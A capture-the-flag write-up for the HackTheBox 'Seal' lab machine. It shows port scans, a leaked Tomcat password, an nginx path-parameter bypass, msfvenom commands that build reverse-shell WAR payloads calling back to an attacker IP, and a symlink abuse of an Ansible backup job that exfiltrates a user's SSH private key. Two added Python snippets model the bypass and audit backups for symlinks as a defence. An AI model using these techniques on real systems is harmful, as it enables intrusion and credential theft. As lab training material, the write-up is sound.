Seal-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: nginx configuration analysis, /host-manager/html access bypass, uploading a WAR package to obtain a reverse shell, searching for files owned by the target user's group, run.yml file analysis, symlink operations, file transfer, sudo privilege escalation

Reference: https://www.jgeek.cn/article/117.html

Reference: https://0xdf.gitlab.io/2021/11/13/htb-seal.html

0x01 Obtaining user privileges

1. Get the target machine's IP address: 10.10.10.250

2. Enumerate the open ports:

┌──(kali㉿kali)-[~/桌面/tools/portscan]
└─$ sudo ./htb-portscan.sh 10.10.10.250 tcp
[sudo] kali 的密码:
开始对 10.10.10.250 进行nmap端口扫描...
* 正在执行tcp协议的端口扫描探测...
sudo nmap -min-rate 10000 -p- "10.10.10.250" -oG "10.10.10.250"-tcp-braker-allports

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-21 20:47 CST
Warning: 10.10.10.250 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.250
Host is up (0.40s latency).
Not shown: 57981 closed tcp ports (reset), 7551 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
443/tcp open https
8080/tcp open http-proxy

Nmap done: 1 IP address (1 host up) scanned in 51.18 seconds
* 正在对开放的端口进行TCP全连接式版本探测和系统版本以及漏洞探测...
sudo nmap -sT -sV -sC -p"22,443,8080," "10.10.10.250"

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-21 20:48 CST
Nmap scan report for 10.10.10.250
Host is up (0.34s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA)
| 256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA)
|_ 256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519)
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg:
|_ http/1.1
| tls-alpn:
|_ http/1.1
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
| Not valid before: 2021-05-05T10:24:03
|_Not valid after: 2022-05-05T10:24:03
|_http-server-header: nginx/1.18.0 (Ubuntu)
8080/tcp open http-proxy
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 401 Unauthorized
| Date: Sun, 21 Jan 2024 12:48:42 GMT
| Set-Cookie: JSESSIONID=node0joxvqq12yfrlvr6cwt5k9wvw2.node0; Path=/; HttpOnly
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Content-Type: text/html;charset=utf-8
| Content-Length: 0
| GetRequest:
| HTTP/1.1 401 Unauthorized
| Date: Sun, 21 Jan 2024 12:48:35 GMT
| Set-Cookie: JSESSIONID=node0f5iw5xempegh2f6jvm84gi5d0.node0; Path=/; HttpOnly
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Content-Type: text/html;charset=utf-8
| Content-Length: 0
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Sun, 21 Jan 2024 12:48:36 GMT
| Set-Cookie: JSESSIONID=node0r3w5lvmxp2on1qtg3ge5m2zz61.node0; Path=/; HttpOnly
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Content-Type: text/html;charset=utf-8
| Allow: GET,HEAD,POST,OPTIONS
| Content-Length: 0
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| Socks4:
| HTTP/1.1 400 Illegal character CNTL=0x4
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>
| Socks5:
| HTTP/1.1 400 Illegal character CNTL=0x5
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>

┌──(kali㉿kali)-[~/桌面/tools/portscan]
└─$ sudo ./htb-portscan.sh 10.10.10.250 udp
开始对 10.10.10.250 进行nmap端口扫描...
* 正在执行udp协议的端口扫描探测...
sudo nmap -min-rate 10000 -p- -sU "10.10.10.250" -oG "10.10.10.250"-udp-braker-allports

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-21 20:51 CST
Warning: 10.10.10.250 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.250
Host is up (0.44s latency).
All 65535 scanned ports on 10.10.10.250 are in ignored states.
Not shown: 65492 open|filtered udp ports (no-response), 43 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 77.30 seconds
* 正在对开放的端口进行udp式版本探测和系统版本探测...
sudo nmap -sV -sU -sC -p"" "10.10.10.250"

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-21 20:52 CST
Error #487: Your port specifications are illegal. Example of proper form: "-100,200-1024,T:3000-4000,U:60000-"
QUITTING!

3. Based on the certificate information on port 443, add the hostname to the local hosts file

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.250 seal.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.250 seal.htb

4. Look at the service on port 8080

http://seal.htb:8080/signin;jsessionid=node01webv6ysmi13s5xip27hbkvjg34.node0?redirect=%2F

5. Register an account

http://seal.htb:8080/register

shiyan
shiyan
shiyan@qq.com

6. After logging in on port 8080, it is clearly a GitBucket instance, hosting two repositories: infra and seal_market

7. The http://seal.htb:8080/root/seal_market repository is the first application: a simple online marketplace that offers free shopping, avoids crowding during the pandemic, and saves time.

8. Looking at the service on port 443, it appears to be this same application

https://seal.htb/

9. Browsing around turns up some information at http://seal.htb:8080/root/seal_market/issues/1: this page reveals two user IDs, alex and luis

Can't we have Tomcat enable mutual authentication?

Possibly, but to balance server load we recommend using Nginx.

10. Look at the nginx configuration

http://seal.htb:8080/root/seal_market/blob/master/nginx/sites-enabled/default

ssl_certificate /var/www/keys/selfsigned.crt;
ssl_certificate_key /var/www/keys/selfsigned.key;
ssl_client_certificate /var/www/keys/selfsigned-ca.crt;

server {
listen 443 ssl default_server;
listen [::]:443 ssl default_server;

# SSL configuration
#
# listen 443 ssl default_server;
# listen [::]:443 ssl default_server;
#
# Note: You should disable gzip for SSL traffic.
# See: https://bugs.debian.org/773332
#
# Read up on ssl_ciphers to ensure a secure configuration.
# See: https://bugs.debian.org/765782
#
# Self signed certs generated by the ssl-cert package
# Don't use them in a production server!
#
# include snippets/snakeoil.conf;

root /var/www/html;
ssl_protocols TLSv1.1 TLSv1.2;
ssl_verify_client optional;

# Add index.php to the list if you are using PHP
index index.html index.htm index.nginx-debian.html;

server_name _;

location /manager/html {
if ($ssl_client_verify != SUCCESS) {
return 403;
}
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_pass http://localhost:8000;
proxy_read_timeout 90;
proxy_redirect http://localhost:8000 https://0.0.0.0;
# First attempt to serve request as file, then
# as directory, then fall back to displaying a 404.
# try_files $uri $uri/ =404;
}


location /admin/dashboard {
if ($ssl_client_verify != SUCCESS) {
return 403;
}
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_pass http://localhost:8000;
proxy_read_timeout 90;
proxy_redirect http://localhost:8000 https://0.0.0.0;
# First attempt to serve request as file, then
# as directory, then fall back to displaying a 404.
# try_files $uri $uri/ =404;
}

location /host-manager/html {
if ($ssl_client_verify != SUCCESS) {
return 403;
}
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_pass http://localhost:8000;
proxy_read_timeout 90;
proxy_redirect http://localhost:8000 https://0.0.0.0;
# First attempt to serve request as file, then
# as directory, then fall back to displaying a 404.
# try_files $uri $uri/ =404;
}


location / {
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_pass http://localhost:8000;
proxy_read_timeout 90;
proxy_redirect http://localhost:8000 https://0.0.0.0;
}
# pass PHP scripts to FastCGI server
#
#location ~ \.php$ {
# include snippets/fastcgi-php.conf;
#
# # With php-fpm (or other unix sockets):
# fastcgi_pass unix:/var/run/php/php7.4-fpm.sock;
# # With php-cgi (or other tcp sockets):
# fastcgi_pass 127.0.0.1:9000;
#}

# deny access to .htaccess files, if Apache's document root
# concurs with nginx's one
#
#location ~ /\.ht {
# deny all;
#}
}

11. When the path is /admin/dashboard (and likewise /manager/html and /host-manager/html), the request is proxied to port 8000 on the server's loopback interface. An if check sits in front of each of these locations: they are reachable only when ssl_client_verify reports SUCCESS, meaning a valid client certificate was presented. The catch-all location / proxies to the same backend with no such check.

12. Browsing the commit history of the tomcat-users.xml file reveals a password

http://seal.htb:8080/root/seal_market/blob/ac210325afd2f6ae17cce84a8aa42805ce5fd010/tomcat/tomcat-users.xml

<user username="tomcat" password="42MrHBf*z8{Z%" roles="manager-gui,admin-gui"/>
</tomcat-users>

13. Now try logging in at https://seal.htb/host-manager/html, but this directory cannot be accessed directly. The https://book.hacktricks.xyz/v/cn/network-services-pentesting/pentesting-web/tomcat guide documents a bypass

http://www.vulnerable.com/;param=value/manager/html

https://seal.htb/;param=value/manager/html
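The bypass works because nginx compares the raw request path against its prefix locations, while Tomcat strips `;param=value` path parameters from each segment before routing. The following model is an added example, not code from the writeup or from either server: the two normalisation functions are simplified approximations written for illustration, and the hardened check shows the defensive fix of taking the access decision on the path as the backend will see it.

```python
"""Model of the nginx/Tomcat path-normalisation mismatch behind the bypass.

Added example; the matching rules below are simplified models, not the real
server code. Prefix list taken from the nginx config quoted in the writeup.
"""
from urllib.parse import unquote

# Locations that the writeup's nginx config guards with ssl_client_verify.
PROTECTED_PREFIXES = ("/manager/html", "/admin/dashboard", "/host-manager/html")


def nginx_requires_client_cert(raw_path: str) -> bool:
    """nginx prefix `location` matching on the request path.

    nginx decodes percent-escapes and collapses dot segments, but it does not
    remove `;param=value` path parameters, so the string is compared as-is.
    """
    path = unquote(raw_path)
    return any(path.startswith(p) for p in PROTECTED_PREFIXES)


def tomcat_normalize(raw_path: str) -> str:
    """Tomcat-style request URI handling: every `/segment;params` loses its
    `;...` suffix, and the empty segments that leaves behind are collapsed."""
    segments = []
    for seg in unquote(raw_path).split("/"):
        seg = seg.split(";", 1)[0]  # drop path parameters such as ;param=value
        if seg:
            segments.append(seg)
    return "/" + "/".join(segments)


def reaches_tomcat_unchecked(raw_path: str) -> bool:
    """True when nginx forwards the request via the unguarded `location /`
    but Tomcat still routes it to one of the protected application paths."""
    if nginx_requires_client_cert(raw_path):
        return False
    routed = tomcat_normalize(raw_path)
    return any(routed.startswith(p) for p in PROTECTED_PREFIXES)


def hardened_requires_client_cert(raw_path: str) -> bool:
    """Mitigation: decide on the normalised path, i.e. the same string the
    backend will route on. In nginx terms the equivalent is to reject any
    request URI containing ';' before it reaches proxy_pass, so that the
    prefix locations and the backend can no longer disagree."""
    routed = tomcat_normalize(raw_path)
    return any(routed.startswith(p) for p in PROTECTED_PREFIXES)
```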

14. Upload a WAR package directly to obtain a reverse shell

┌──(kali㉿kali)-[~/桌面]
└─$ msfvenom -p java/shell_reverse_tcp lhost=10.10.14.3 lport=443 -f war -o rce.war
Payload size: 12804 bytes
Final size of war file: 12804 bytes
Saved as: rce.war

15. The upload ran into a problem: a 403 unauthorized response. That is probably because the session is missing, so just find a session and add it?

Cookie: JSESSIONID=A55FDD58CCFC458882176EE2AFC20144; 

16. After that the page displayed normally

https://seal.htb/;param=value/manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=6B1EF5DC0DF5C73FB4C7B0C52BF5B7B3

Sure enough, the uploaded package now shows up on the page

But accessing it returns a 500 error; the generated WAR package probably still has some problem

17. Regenerate a new payload package

┌──(kali㉿kali)-[~/桌面]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.3 LPORT=443 -f war -o shell.war
Payload size: 1090 bytes
Final size of war file: 1090 bytes
Saved as: shell.war

18. Visiting https://seal.htb/shell/ successfully yields a reverse shell

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.250] 51192
id
uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)

19. Checking the current privileges shows that escalation is still needed before the first flag can be obtained

python3 -c 'import pty;pty.spawn("/bin/bash")'
tomcat@seal:/var/lib/tomcat9$
tomcat@seal:/var/lib/tomcat9$ ls -la /home
ls -la /home
total 12
drwxr-xr-x 3 root root 4096 May 5 2021 .
drwxr-xr-x 20 root root 4096 May 7 2021 ..
drwxr-xr-x 9 luis luis 4096 May 7 2021 luis
tomcat@seal:/var/lib/tomcat9$ ls -la/home/luis
ls -la/home/luis
ls: invalid option -- '/'
Try 'ls --help' for more information.
tomcat@seal:/var/lib/tomcat9$ ls -la /home/luis
ls -la /home/luis
total 51320
drwxr-xr-x 9 luis luis 4096 May 7 2021 .
drwxr-xr-x 3 root root 4096 May 5 2021 ..
drwxrwxr-x 3 luis luis 4096 May 7 2021 .ansible
lrwxrwxrwx 1 luis luis 9 May 5 2021 .bash_history -> /dev/null
-rw-r--r-- 1 luis luis 220 May 5 2021 .bash_logout
-rw-r--r-- 1 luis luis 3797 May 5 2021 .bashrc
drwxr-xr-x 3 luis luis 4096 May 7 2021 .cache
drwxrwxr-x 3 luis luis 4096 May 5 2021 .config
drwxrwxr-x 6 luis luis 4096 Jan 21 12:46 .gitbucket
-rw-r--r-- 1 luis luis 52497951 Jan 14 2021 gitbucket.war
drwxrwxr-x 3 luis luis 4096 May 5 2021 .java
drwxrwxr-x 3 luis luis 4096 May 5 2021 .local
-rw-r--r-- 1 luis luis 807 May 5 2021 .profile
drwx------ 2 luis luis 4096 May 7 2021 .ssh
-r-------- 1 luis luis 33 Jan 21 12:46 user.txt
tomcat@seal:/var/lib/tomcat9$

20. Looking at files owned by the target user's group reveals some backup information

tomcat@seal:/var/lib/tomcat9$ find / -group luis 2>/dev/null | grep -v /proc | grep -v /home
<up luis 2>/dev/null | grep -v /proc | grep -v /home
/opt/backups
/opt/backups/archives
/opt/backups/archives/backup-2024-01-21-14:30:33.gz
/opt/backups/playbook
/opt/backups/playbook/run.yml
tomcat@seal:/var/lib/tomcat9$

21. The user luis can operate on the files above

tomcat@seal:/var/lib/tomcat9$ cat /opt/backups/playbook/run.yml
cat /opt/backups/playbook/run.yml
- hosts: localhost
tasks:
- name: Copy Files
synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes
- name: Server Backups
archive:
path: /opt/backups/files/
dest: "/opt/backups/archives/backup-{{ansible_date_time.date}}-{{ansible_date_time.time}}.gz"
- name: Clean
file:
state: absent
path: /opt/backups/files/
tomcat@seal:/var/lib/tomcat9$

"Copy Files" takes all the files from the dashboard and uses the synchronize module to copy them into the files folder in this directory. Be sure to note the copy_links=yes directive.

"Server Backups" runs the archive module, which generates a timestamped .gz file.

"Clean" uses the file module to delete the files directory.

To take advantage of this, I need to find somewhere in the Tomcat web directory that is writable. The uploads folder works:
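Because copy_links=yes makes synchronize dereference every symlink in the uploads directory, a link planted there is silently expanded into the backup. The following pre-backup audit is an added example, not part of the writeup or of the run.yml playbook: it builds a constructed temporary copy of the dashboard tree, plants one link that escapes it, and shows how a backup job can detect such links and refuse to archive instead of following them.

```python
"""Pre-backup symlink audit: the check that copy_links=yes skips.

Added example. The sample directory tree is constructed inside a temporary
directory; nothing here touches the target machine.
"""
from __future__ import annotations

import os
import tempfile
from pathlib import Path


def escaping_symlinks(root: str) -> list[tuple[str, str]]:
    """Return (link, resolved_target) for every symlink under `root` whose
    final target lies outside `root`. The walk never follows links, so a
    planted link cannot redirect the audit itself."""
    base = Path(root).resolve()
    found = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            p = Path(dirpath) / name
            if not p.is_symlink():
                continue
            target = p.resolve()  # follows the whole chain to the final target
            try:
                target.relative_to(base)
            except ValueError:  # target is not inside the backed-up tree
                found.append((str(p), str(target)))
    return found


def safe_to_archive(root: str) -> bool:
    """Policy equivalent of dropping copy_links=yes: archive the tree only
    when no link inside it points outside it."""
    return not escaping_symlinks(root)


def demo() -> dict:
    """Constructed sample: one harmless in-tree link, one link that escapes."""
    with tempfile.TemporaryDirectory() as tmp:
        dashboard = Path(tmp) / "dashboard"
        uploads = dashboard / "uploads"
        uploads.mkdir(parents=True)
        # Something outside the backup scope, standing in for a home directory.
        outside = Path(tmp) / "outside"
        outside.mkdir()
        (outside / "id_rsa").write_text("constructed placeholder, not a real key\n")
        (uploads / "logo.png").write_bytes(b"\x89PNG")
        (uploads / "ok").symlink_to(uploads / "logo.png")  # stays inside the tree
        (uploads / "leak").symlink_to(outside)             # escapes the tree
        bad = escaping_symlinks(str(dashboard))
        return {
            "escaping": sorted(os.path.basename(link) for link, _ in bad),
            "safe": safe_to_archive(str(dashboard)),
        }
```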

22. So we can use the backup to get the home directory of luis archived, which lets us obtain some of the target's information, such as .ssh

tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard$ ln -s /home/luis/ /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/
<r/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard$ cd uploads/
cd uploads/
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads$ ls -la
ls -la
total 8
drwxrwxrwx 2 root root 4096 Jan 21 14:35 .
drwxr-xr-x 7 root root 4096 May 7 2021 ..
lrwxrwxrwx 1 tomcat tomcat 11 Jan 21 14:35 luis -> /home/luis/
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads$ cd luis
cd luis
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/luis$ ls
ls
gitbucket.war user.txt
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/luis$ ls -la
<9/webapps/ROOT/admin/dashboard/uploads/luis$ ls -la
total 51320
drwxr-xr-x 9 luis luis 4096 May 7 2021 .
drwxr-xr-x 3 root root 4096 May 5 2021 ..
drwxrwxr-x 3 luis luis 4096 May 7 2021 .ansible
lrwxrwxrwx 1 luis luis 9 May 5 2021 .bash_history -> /dev/null
-rw-r--r-- 1 luis luis 220 May 5 2021 .bash_logout
-rw-r--r-- 1 luis luis 3797 May 5 2021 .bashrc
drwxr-xr-x 3 luis luis 4096 May 7 2021 .cache
drwxrwxr-x 3 luis luis 4096 May 5 2021 .config
drwxrwxr-x 6 luis luis 4096 Jan 21 12:46 .gitbucket
-rw-r--r-- 1 luis luis 52497951 Jan 14 2021 gitbucket.war
drwxrwxr-x 3 luis luis 4096 May 5 2021 .java
drwxrwxr-x 3 luis luis 4096 May 5 2021 .local
-rw-r--r-- 1 luis luis 807 May 5 2021 .profile
drwx------ 2 luis luis 4096 May 7 2021 .ssh
-r-------- 1 luis luis 33 Jan 21 12:46 user.txt
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/luis$ cd .ssh
</webapps/ROOT/admin/dashboard/uploads/luis$ cd .ssh
bash: cd: .ssh: Permission denied
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/luis$ ls
ls
gitbucket.war user.txt
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/luis$ cd ../
<9/webapps/ROOT/admin/dashboard/uploads/luis$ cd ../
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads$

23. Check the backups

tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads$ cd ../
cd ../
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard$ ls -l /opt/backups/archives/
</ROOT/admin/dashboard$ ls -l /opt/backups/archives/
total 338676
-rw-rw-r-- 1 luis luis 115600641 Jan 21 14:35 backup-2024-01-21-14:35:32.gz
-rw-rw-r-- 1 luis luis 115600685 Jan 21 14:36 backup-2024-01-21-14:36:33.gz
-rw-rw-r-- 1 luis luis 115600731 Jan 21 14:37 backup-2024-01-21-14:37:32.gz
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard$ cd /opt/backups/archives/
<pps/ROOT/admin/dashboard$ cd /opt/backups/archives/
tomcat@seal:/opt/backups/archives$ ls -la
ls -la
total 338684
drwxrwxr-x 2 luis luis 4096 Jan 21 14:37 .
drwxr-xr-x 4 luis luis 4096 Jan 21 14:37 ..
-rw-rw-r-- 1 luis luis 115600641 Jan 21 14:35 backup-2024-01-21-14:35:32.gz
-rw-rw-r-- 1 luis luis 115600685 Jan 21 14:36 backup-2024-01-21-14:36:33.gz
-rw-rw-r-- 1 luis luis 115600731 Jan 21 14:37 backup-2024-01-21-14:37:32.gz
tomcat@seal:/opt/backups/archives$ tar -xvf backup-2024-01-21-14:37:32.gz
tar -xvf backup-2024-01-21-14:37:32.gz
tar: Cannot connect to backup-2024-01-21-14: resolve failed
tomcat@seal:/opt/backups/archives$ ls
ls
backup-2024-01-21-14:35:32.gz backup-2024-01-21-14:37:32.gz
backup-2024-01-21-14:36:33.gz backup-2024-01-21-14:38:33.gz
tomcat@seal:/opt/backups/archives$

24. There are a lot of files, so transferring them with Base64 is not practical; better start a python3 web server and download them. Actually, the file is still too large, so let's redo the symlink and link the .ssh directory directly

tomcat@seal:/var/lib/tomcat9$ ln -s /home/luis/.ssh/ /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/
<r/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/
tomcat@seal:/var/lib/tomcat9$

25. Check what was retrieved

tomcat@seal:/var/lib/tomcat9$ ls -la /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/
<r/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/
total 8
drwxrwxrwx 2 root root 4096 Jan 21 14:47 .
drwxr-xr-x 7 root root 4096 May 7 2021 ..
lrwxrwxrwx 1 tomcat tomcat 16 Jan 21 14:47 .ssh -> /home/luis/.ssh/
tomcat@seal:/var/lib/tomcat9$ cd

tomcat@seal:/var/lib/tomcat9$ cd /opt/backups/archives/
cd /opt/backups/archives/
tomcat@seal:/opt/backups/archives$ ls
ls
backup-2024-01-21-14:45:33.gz backup-2024-01-21-14:47:32.gz
backup-2024-01-21-14:46:33.gz
tomcat@seal:/opt/backups/archives$ cp backup-2024-01-21-14:47:32.gz /tmp/backup-2024-01-21-14:47:32.gz
<1-21-14:47:32.gz /tmp/backup-2024-01-21-14:47:32.gz
tomcat@seal:/opt/backups/archives$ ls -la /tmp
ls -la /tmp
total 608
drwxrwxrwt 3 root root 4096 Jan 21 14:48 .
drwxr-xr-x 20 root root 4096 May 7 2021 ..
-rw-r----- 1 tomcat tomcat 609575 Jan 21 14:48 backup-2024-01-21-14:47:32.gz
drwxr-x--- 2 tomcat tomcat 4096 Jan 21 12:46 hsperfdata_tomcat
tomcat@seal:/opt/backups/archives$ cd tmp
cd tmp
bash: cd: tmp: No such file or directory

tomcat@seal:/opt/backups/archives$
tomcat@seal:/opt/backups/archives$ cd /tmp
cd /tmp
tomcat@seal:/tmp$ ls -la
ls -la
total 608
drwxrwxrwt 3 root root 4096 Jan 21 14:48 .
drwxr-xr-x 20 root root 4096 May 7 2021 ..
-rw-r----- 1 tomcat tomcat 609575 Jan 21 14:48 backup-2024-01-21-14:47:32.gz
drwxr-x--- 2 tomcat tomcat 4096 Jan 21 12:46 hsperfdata_tomcat
tomcat@seal:/tmp$ tar -xvf backup-2024-01-21-14:47:32.gz
tar -xvf backup-2024-01-21-14:47:32.gz
tar: Cannot connect to backup-2024-01-21-14: resolve failed
tomcat@seal:/tmp$
tomcat@seal:/tmp$ tar -xvf backup-2024-01-21-14:47:32.gz --force-local
tar -xvf backup-2024-01-21-14:47:32.gz --force-local
dashboard/
dashboard/scripts/
dashboard/images/
dashboard/css/
dashboard/uploads/
dashboard/bootstrap/
dashboard/index.html
dashboard/scripts/flot/
dashboard/scripts/datatables/
dashboard/scripts/jquery-ui-1.10.1.custom.min.js
dashboard/scripts/common.js
dashboard/scripts/jquery-1.9.1.min.js
dashboard/scripts/flot/jquery.flot.resize.js
dashboard/scripts/flot/jquery.flot.pie.js
dashboard/scripts/flot/jquery.flot.js
dashboard/scripts/datatables/jquery.dataTables.js
dashboard/images/jquery-ui/
dashboard/images/icons/
dashboard/images/img.jpg
dashboard/images/user.png
dashboard/images/bg.png
dashboard/images/jquery-ui/picker.png
dashboard/images/icons/css/
dashboard/images/icons/font/
dashboard/images/icons/css/font-awesome.css
dashboard/images/icons/font/fontawesome-webfont3294.ttf
dashboard/images/icons/font/fontawesome-webfontd41d.eot
dashboard/images/icons/font/fontawesome-webfont3294.eot
dashboard/images/icons/font/fontawesome-webfont3294.woff
dashboard/css/theme.css
dashboard/uploads/.ssh/
dashboard/uploads/.ssh/id_rsa
dashboard/uploads/.ssh/id_rsa.pub
dashboard/uploads/.ssh/authorized_keys
dashboard/bootstrap/css/
dashboard/bootstrap/js/
dashboard/bootstrap/img/
dashboard/bootstrap/css/bootstrap-responsive.min.css
dashboard/bootstrap/css/bootstrap.min.css
dashboard/bootstrap/js/bootstrap.min.js
dashboard/bootstrap/img/glyphicons-halflings.png
dashboard/bootstrap/img/glyphicons-halflings-white.png
tomcat@seal:/tmp$ ls
ls
backup-2024-01-21-14:47:32.gz dashboard hsperfdata_tomcat
tomcat@seal:/tmp$ cd dashboard
cd dashboard
tomcat@seal:/tmp/dashboard$ ls
ls
bootstrap css images index.html scripts uploads
tomcat@seal:/tmp/dashboard$ cd uploads
cd uploads
tomcat@seal:/tmp/dashboard/uploads$ ls
ls
tomcat@seal:/tmp/dashboard/uploads$ ls -la
ls -la
total 12
drwxr-x--- 3 tomcat tomcat 4096 Jan 21 14:49 .
drwxr-x--- 7 tomcat tomcat 4096 May 7 2021 ..
drwx------ 2 tomcat tomcat 4096 May 7 2021 .ssh
tomcat@seal:/tmp/dashboard/uploads$ cd .ssh
cd .ssh
tomcat@seal:/tmp/dashboard/uploads/.ssh$ ls -la
ls -la
total 20
drwx------ 2 tomcat tomcat 4096 May 7 2021 .
drwxr-x--- 3 tomcat tomcat 4096 Jan 21 14:49 ..
-rw-r----- 1 tomcat tomcat 563 May 7 2021 authorized_keys
-rw------- 1 tomcat tomcat 2590 May 7 2021 id_rsa
-rw-r----- 1 tomcat tomcat 563 May 7 2021 id_rsa.pub
tomcat@seal:/tmp/dashboard/uploads/.ssh$

26. Next, save this .ssh private key locally

tomcat@seal:/tmp/dashboard/uploads/.ssh$ cat id_rsa | base64
cat id_rsa | base64
tomcat@seal:/tmp/dashboard/uploads/.ssh$

echo LS0tLS......EtFWS0tLS0tCg== | base64 -d > id_rsa

┌──(kali㉿kali)-[~/桌面]
└─$ chmod 600 id_rsa

┌──(kali㉿kali)-[~/桌面]
└─$ ssh luis@10.10.10.250 -i id_rsa
The authenticity of host '10.10.10.250 (10.10.10.250)' can't be established.
ED25519 key fingerprint is SHA256:CK0IgtHX4isQwWAPna6oD88DnRAM9OacxQExxLSnlL0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.250' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun 21 Jan 2024 02:55:30 PM UTC

System load: 0.05
Usage of /: 46.6% of 9.58GB
Memory usage: 26%
Swap usage: 0%
Processes: 165
Users logged in: 0
IPv4 address for eth0: 10.10.10.250
IPv6 address for eth0: dead:beef::250:56ff:feb9:9cd9


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri May 7 07:00:18 2021 from 10.10.14.2
luis@seal:~$ id
uid=1000(luis) gid=1000(luis) groups=1000(luis)
luis@seal:~$

27. Login succeeded; next, get the first flag

luis@seal:~$ ls
gitbucket.war user.txt
luis@seal:~$ cat user.txt
4923ddadf9345f6a0a97f56293c05978
luis@seal:~$

0x02 Obtaining system privileges

28. Check the sudo configuration

luis@seal:~$ sudo -l
Matching Defaults entries for luis on seal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User luis may run the following commands on seal:
(ALL) NOPASSWD: /usr/bin/ansible-playbook *
luis@seal:~$

29. This is a trivial privilege escalation

https://gtfobins.github.io/gtfobins/ansible-playbook/#sudo

luis@seal:~$ 
